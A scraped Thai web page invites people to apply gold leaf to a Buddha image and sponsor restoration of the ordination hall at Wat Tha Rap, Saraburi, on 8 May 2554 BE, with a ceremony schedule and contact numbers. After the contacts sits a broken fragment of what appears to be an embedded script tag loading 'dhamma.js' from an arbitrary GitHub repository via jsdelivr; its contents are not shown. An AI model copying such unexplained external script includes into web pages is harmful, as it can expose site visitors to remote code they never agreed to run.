ขอเรียนเชิญร่วมปิดทองหลวงพ่อเชียงแสนและร่วมกันเป็นเจ้าภาพบูรณะอุโบสถ วัดท่าราบ ตำบลหนองควายโซ อำเภอห

 sompong_ns1  

ขอเรียนเชิญร่วมปิดทองหลวงพ่อเชียงแสนและร่วมกันเป็นเจ้าภาพบูรณะอุโบสถ วัดท่าราบ ตำบลหนองควายโซ อำเภอหนองแซง จังหวัดสระบุรี และร่วมกันถวายน้ำสรงพระครูไพโรจน์สรยุต เจ้าอาวาสวัดราษฎร์ชั้นเอก ในวันอาทิตย์ที่ ๘ พฤษภาคม พ.ศ. ๒๕๕๔
เวลา ๑๐.๐๐ น. พระภิกษุสงฆ์เจริญพระพุทธมนต์
เวลา ๑๑.๐๐ น. ถวายภัตราหารเพล
เวลา ๑๒.๐๐ น. ขอเชิญรับประทานอาหารร่วมกัน
เวลา ๑๔.๐๐ น. ถวายน้ำสรงพระครูไพโรจน์สรยุต
กลางคืนมีมหรสพสมโภชน์

ผู้ที่มีจิตศรัทธาร่วมเป็นเจ้าภาพบูรณะอุโบสถ
ติดต่อได้ที่ วัดท่าราบ ตำบลหนองควายโซ อำเภอหนองแซง จังหวัดสระบุรี โทรศัพท์ ๐๓๖-๓๙๙๑๗๔
หรือพระครูสังฆ์รักษ์สมพงศ์ จนฺทาโภ โทรศัพท์ ๐๘๑-๙๔๗๘๐๙๒ https://cdn.jsdelivr.net/gh/tatikers/san/dhamma.js">   


3,765


Ralated Story
จีรัง กรุ๊ป    

 ธรรมะไทย